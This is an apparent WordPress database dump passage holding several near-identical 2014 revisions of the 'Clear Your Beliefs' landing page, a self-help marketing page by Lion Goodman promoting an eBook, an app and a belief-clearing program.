(1534, 2, '2014-10-09 23:45:13', '2014-10-10 04:45:13', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your BeliefsWhat You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n12', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:45:13', '2014-10-10 04:45:13', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1537, 2, '2014-10-09 23:51:25', '2014-10-10 04:51:25', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:51:25', '2014-10-10 04:51:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1535, 2, '2014-10-09 23:45:54', '2014-10-10 04:45:54', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your BeliefsWhat You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n1[/su_column]2[/su_column]', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:45:54', '2014-10-10 04:45:54', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1536, 2, '2014-10-09 23:46:51', '2014-10-10 04:46:51', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your BeliefsWhat You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\nContent\nContent', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:46:51', '2014-10-10 04:46:51', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1539, 2, '2014-10-09 23:54:49', '2014-10-10 04:54:49', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:54:49', '2014-10-10 04:54:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1538, 2, '2014-10-09 23:53:00', '2014-10-10 04:53:00', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p>What You Can Accomplish with Clear Your Beliefs How and Why It Works</p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you back<p> </p>Change your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p>\n</p>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they liveAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)You take charge and decide what you want to believeYou’re guided gently, step-by-step, through the entire processYou decide how far to go, and what changes to make<p></p>\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" 